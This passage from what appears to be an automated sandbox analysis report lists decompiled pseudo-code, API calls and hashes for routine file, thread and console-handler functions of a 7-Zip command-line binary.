				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				_t28 = _t17;
				_t18 =  *(_t30 - 0x10);
				if(_t18 != 0) {
					 *((intOrPtr*)( *_t18 + 8))(_t18);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t28;
			}







                                                                      0x0040c919
                                                                      0x0040c91e
                                                                      0x0040c91f
                                                                      0x0040c928
                                                                      0x0040c93b
                                                                      0x0040c940
                                                                      0x0040c944
                                                                      0x0040c946
                                                                      0x0040c94b
                                                                      0x0040c950
                                                                      0x0040c950
                                                                      0x0040c959
                                                                      0x0040c961

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0040C919
                                                                        • Part of subcall function 0040C83C: __EH_prolog.LIBCMT ref: 0040C841
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 99378acdd3581c8dad4e7dff9413259cddc864b686160a7ef6cc3208cd7c5292
                                                                      • Instruction ID: 5a94585eceb8510585562d7b83d4e929578e69876529fb1f756434af7c7637c0
                                                                      • Opcode Fuzzy Hash: 99378acdd3581c8dad4e7dff9413259cddc864b686160a7ef6cc3208cd7c5292
                                                                      • Instruction Fuzzy Hash: 9AF05E72A00219EFDB14EF98CC01BEEB779FB44355F10826AB425E7290C7789E00CB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405C72 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 84%
                                                                      			E00405C72(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t14;
				void* _t17;
				void* _t22;
				void* _t24;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;

				_t32 = __eflags;
				E0046B890(E004734B8, _t27);
				_push(_t17);
				_push(_t24);
				 *0x490a80 = 0x490ab8;
				 *((intOrPtr*)(_t27 - 0x10)) = _t29 - 0x30;
				 *0x490a7c = E00405F22();
				E004018A2(_t27 - 0x14);
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				 *(_t27 - 4) = 1;
				_t14 = E00403A70(_t17, _t22, _t24, _t32, _t22); // executed
				_t25 = _t14;
				 *(_t27 - 4) =  *(_t27 - 4) | 0xffffffff;
				E00401917(_t27 - 0x14); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t25;
			}














                                                                      0x00405c72
                                                                      0x00405c77
                                                                      0x00405c7f
                                                                      0x00405c80
                                                                      0x00405c82
                                                                      0x00405c8c
                                                                      0x00405c97
                                                                      0x00405c9c
                                                                      0x00405ca1
                                                                      0x00405ca5
                                                                      0x00405ca9
                                                                      0x00405cae
                                                                      0x00405f05
                                                                      0x00405f0c
                                                                      0x00405f18
                                                                      0x00405f21

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00405C77
                                                                        • Part of subcall function 00405F22: GetVersionExA.KERNEL32(?), ref: 00405F3C
                                                                        • Part of subcall function 004018A2: SetConsoleCtrlHandler.KERNEL32(004018DA,00000001,?,?,?,00405CA1), ref: 004018B6
                                                                        • Part of subcall function 00403A70: __EH_prolog.LIBCMT ref: 00403A75
                                                                        • Part of subcall function 00403A70: SetFileApisToOEM.KERNEL32 ref: 00403A83
                                                                        • Part of subcall function 00403A70: GetCommandLineW.KERNEL32 ref: 00403A9E
                                                                        • Part of subcall function 00401917: SetConsoleCtrlHandler.KERNELBASE(004018DA,00000000,?,?,00405F11), ref: 00401928
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleCtrlH_prologHandler$ApisCommandFileLineVersion
                                                                      • String ID:
                                                                      • API String ID: 3811785086-0
                                                                      • Opcode ID: e9cb7d4847eacb32bd0261b85e1eabd0854b54bd825164040ec013db58bdf870
                                                                      • Instruction ID: fcab1c6799a526d6cc84579c245541fcc004ed5d2a27ee256b075ce021a0ee51
                                                                      • Opcode Fuzzy Hash: e9cb7d4847eacb32bd0261b85e1eabd0854b54bd825164040ec013db58bdf870
                                                                      • Instruction Fuzzy Hash: 9FF0BE72D002459ECB04EBAA980269EBB74EB60368F10857FE412732D1D77C0B04CBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040BD9F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E0040BD9F(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x48b5b0; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}







                                                                      0x0040bd9f
                                                                      0x0040bda2
                                                                      0x0040bda3
                                                                      0x0040bdab
                                                                      0x0040bdad
                                                                      0x0040bdad
                                                                      0x0040bdb6
                                                                      0x0040bdc2
                                                                      0x0040bdd0
                                                                      0x0040bdd6

                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0040BDC2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 293fb559e6840d76b7e7019225d963716ccc77cfe30249145607202f06dff26f
                                                                      • Instruction ID: f5b03d0275e53328e8766596d7aa07537ccbbd1802995bf3e8a2da8ce39c38f6
                                                                      • Opcode Fuzzy Hash: 293fb559e6840d76b7e7019225d963716ccc77cfe30249145607202f06dff26f
                                                                      • Instruction Fuzzy Hash: 84E0C275600208FBCB01CF95C841B8E7BB9EB48354F20C069F919AA2A0D739AA50DF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046CE2E Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E0046CE2E() {
				intOrPtr* _t5;
				void* _t14;
				intOrPtr _t15;

				_t15 =  *((intOrPtr*)(_t14 - 0x18));
				E0046E706( *((intOrPtr*)(_t14 - 0x20)));
				_t5 =  *0x4965a4; // 0x0
				if(_t5 != 0) {
					 *_t5();
				}
				_t13 = E0046E383();
				if(_t6 == 0) {
					E0046D03C(0x10);
				}
				E0046E3EA(_t13);
				ExitThread( *(_t15 + 8));
			}






                                                                      0x0046ce2e
                                                                      0x0046ce34
                                                                      0x0046ce39
                                                                      0x0046ce40
                                                                      0x0046ce42
                                                                      0x0046ce42
                                                                      0x0046ce4a
                                                                      0x0046ce4e
                                                                      0x0046ce52
                                                                      0x0046ce57
                                                                      0x0046ce59
                                                                      0x0046ce63

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ExitThread
                                                                      • String ID:
                                                                      • API String ID: 2158977761-0
                                                                      • Opcode ID: c5135cbf11f344371f6cf3902ba34674a06b3dda85637e8f4185bdea1e723400
                                                                      • Instruction ID: 64bb69de8ff6d42c3457098edc656902f5609d49139222b7e3e69db672cf67b2
                                                                      • Opcode Fuzzy Hash: c5135cbf11f344371f6cf3902ba34674a06b3dda85637e8f4185bdea1e723400
                                                                      • Instruction Fuzzy Hash: 4CE086319001115FDB2127A2DC0A66F3670AF00354F01002BF8405A260FB598C91469F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042F024 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 82%
                                                                      			E0042F024(intOrPtr* __ecx, void* __eflags) {
				void* _t10;
				void* _t19;
				intOrPtr _t21;

				E0046B890(E004776A4, _t19);
				_push(__ecx);
				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
				 *((intOrPtr*)(_t19 - 0x10)) = _t21;
				_t10 = E0042EC5C(__ecx, __eflags,  *((intOrPtr*)(_t19 + 8)),  *((intOrPtr*)(_t19 + 0xc)),  *((intOrPtr*)(_t19 + 0x10))); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0xc));
				return _t10;
			}






                                                                      0x0042f029
                                                                      0x0042f02e
                                                                      0x0042f032
                                                                      0x0042f036
                                                                      0x0042f042
                                                                      0x0042f057
                                                                      0x0042f060

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0042F029
                                                                        • Part of subcall function 0042EC5C: __EH_prolog.LIBCMT ref: 0042EC61
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 89d83f9e4c00c039be1d184f45ea62dd8a41aa49ca7f469a3101ba73a4b22e09
                                                                      • Instruction ID: f263eec74e2fdc413f8ce8191d7481965beeba368c6f144b2a49cdf0410d163b
                                                                      • Opcode Fuzzy Hash: 89d83f9e4c00c039be1d184f45ea62dd8a41aa49ca7f469a3101ba73a4b22e09
                                                                      • Instruction Fuzzy Hash: 56E04632A00118FBCB01AF8AD801BEE7B38FB453A4F00842BF01556001C3BA99109AA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040BC58 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 75%
                                                                      			E0040BC58(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}





                                                                      0x0040bc5b
                                                                      0x0040bc62
                                                                      0x0040bc6e
                                                                      0x0040bc7c
                                                                      0x0040bc82

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(000000FF,?,?,?,00000000,000000FF,?,0040BCA3,?,?,00000000,?,0040BCC9,?,?,00000002), ref: 0040BC6E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 119bd35a6ca8e8dfe3fd58043442ef1f0f2720401cd9468696989d7f5503d79e
                                                                      • Instruction ID: e80a47eef93cbac88b9d1de4091ab22be8c7773048f98afb7b75ce3e7b1ffdc8
                                                                      • Opcode Fuzzy Hash: 119bd35a6ca8e8dfe3fd58043442ef1f0f2720401cd9468696989d7f5503d79e
                                                                      • Instruction Fuzzy Hash: DEE0EC75200208FBDB01CF90CC01F8E7BB9FB49754F208058E90596160C375AA64EB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046CE39 Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 75%
                                                                      			E0046CE39(long _a4) {
				intOrPtr* _t2;

				_t2 =  *0x4965a4; // 0x0
				if(_t2 != 0) {
					 *_t2();
				}
				_t10 = E0046E383();
				if(_t3 == 0) {
					E0046D03C(0x10);
				}
				E0046E3EA(_t10);
				ExitThread(_a4);
			}




                                                                      0x0046ce39
                                                                      0x0046ce40
                                                                      0x0046ce42
                                                                      0x0046ce42
                                                                      0x0046ce4a
                                                                      0x0046ce4e
                                                                      0x0046ce52
                                                                      0x0046ce57
                                                                      0x0046ce59
                                                                      0x0046ce63

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ExitThread
                                                                      • String ID:
                                                                      • API String ID: 2158977761-0
                                                                      • Opcode ID: a8c2bd8bc36288136cb985c6ef66aa088bd3311e3ca7684abd4a46ab8bba787c
                                                                      • Instruction ID: a94cd4d5187b38e27ba911a5e394843a57b7ffb4073ce8cb43cd479127d45c81
                                                                      • Opcode Fuzzy Hash: a8c2bd8bc36288136cb985c6ef66aa088bd3311e3ca7684abd4a46ab8bba787c
                                                                      • Instruction Fuzzy Hash: E5D05E31A416226EE6322762DC4AA2F22A49F00754B01002FF8848A260FF598C81419F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0043394A Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 37%
                                                                      			E0043394A(void* __ecx) {
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t12;

				E0046B890(0x477baa, _t12);
				_push(__ecx);
				_push(0x270);
				_t10 = E004079F2();
				 *((intOrPtr*)(_t12 - 0x10)) = _t10;
				_t7 = 0;
				_t15 = _t10;
				 *((intOrPtr*)(_t12 - 4)) = 0;
				if(_t10 != 0) {
					_t7 = E0042A3CD(_t10, _t15); // executed
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t12 - 0xc));
				return _t7;
			}






                                                                      0x0043394f
                                                                      0x00433954
                                                                      0x00433955
                                                                      0x00433960
                                                                      0x00433962
                                                                      0x00433965
                                                                      0x00433967
                                                                      0x00433969
                                                                      0x0043396c
                                                                      0x0043396e
                                                                      0x0043396e
                                                                      0x00433976
                                                                      0x0043397e

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0043394F
                                                                        • Part of subcall function 0042A3CD: __EH_prolog.LIBCMT ref: 0042A3D2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 49664c6f3ba43aa1f642359bb80e799efb126460c9142e8bc53b2b48cf8044a7
                                                                      • Instruction ID: 784fa2737f9a3aecb95f3671ac57fc4e3df94eaba76e5e114e4ffca640bbc759
                                                                      • Opcode Fuzzy Hash: 49664c6f3ba43aa1f642359bb80e799efb126460c9142e8bc53b2b48cf8044a7
                                                                      • Instruction Fuzzy Hash: 80D017B1A442159BDB08FBA8944236D72A1AB08308F10857FA41AE3780EB785900866A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040B154 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040B154(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindClose(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                                                      0x0040b155
                                                                      0x0040b157
                                                                      0x0040b15c
                                                                      0x0040b170
                                                                      0x0040b173
                                                                      0x0040b15e
                                                                      0x0040b15f
                                                                      0x0040b167
                                                                      0x0040b16d
                                                                      0x00000000
                                                                      0x0040b169
                                                                      0x0040b16c
                                                                      0x0040b16c
                                                                      0x0040b167

                                                                      APIs
                                                                      • FindClose.KERNELBASE(00000000,?,0040B18C), ref: 0040B15F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CloseFind
                                                                      • String ID:
                                                                      • API String ID: 1863332320-0
                                                                      • Opcode ID: 44b45b29d53ae0ee441c7631a48af92bc4367c4c071d9c8d09f5d2f54756129b
                                                                      • Instruction ID: b21785a81a83a5848f3eefaff4503489f3c43cb4ff3f3a84b902145481c2820f
                                                                      • Opcode Fuzzy Hash: 44b45b29d53ae0ee441c7631a48af92bc4367c4c071d9c8d09f5d2f54756129b
                                                                      • Instruction Fuzzy Hash: 14D0123110426186CA641E3C78589C733D89A463B03214B6AF4B4D72E1D3749CD356EC
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401917 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 82%
                                                                      			E00401917(intOrPtr* __ecx) {
				char* _v8;
				int _t3;

				_push(__ecx);
				 *__ecx = 0x47a258; // executed
				_t3 = SetConsoleCtrlHandler(E004018DA, 0); // executed
				if(_t3 == 0) {
					_v8 = "SetConsoleCtrlHandler fails";
					return E0046B8F4( &_v8, 0x47cf70);
				}
				return _t3;
			}





                                                                      0x0040191a
                                                                      0x00401922
                                                                      0x00401928
                                                                      0x00401930
                                                                      0x0040193b
                                                                      0x00000000
                                                                      0x00401942
                                                                      0x00401948

                                                                      APIs
                                                                      • SetConsoleCtrlHandler.KERNELBASE(004018DA,00000000,?,?,00405F11), ref: 00401928
                                                                        • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleCtrlExceptionHandlerRaise
                                                                      • String ID:
                                                                      • API String ID: 118816144-0
                                                                      • Opcode ID: 7d417b143ea1433f04c1f19a4f714dece2fd5a2579662ce84d2d8607feb3290c
                                                                      • Instruction ID: 6ced6f053643f7caf5f562c5cf66968f1a01d4a1bbfb89d95e4470d53f11f31c
                                                                      • Opcode Fuzzy Hash: 7d417b143ea1433f04c1f19a4f714dece2fd5a2579662ce84d2d8607feb3290c
                                                                      • Instruction Fuzzy Hash: 21D05BB024030876D710EF958D06B4D369CDB81748F20809BE104B22D1E7F9A500571E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040B9C0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040B9C0(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                                                      0x0040b9c1
                                                                      0x0040b9c3
                                                                      0x0040b9c8
                                                                      0x0040b9dc
                                                                      0x0040b9df
                                                                      0x0040b9ca
                                                                      0x0040b9cb
                                                                      0x0040b9d3
                                                                      0x0040b9d9
                                                                      0x00000000
                                                                      0x0040b9d5
                                                                      0x0040b9d8
                                                                      0x0040b9d8
                                                                      0x0040b9d3

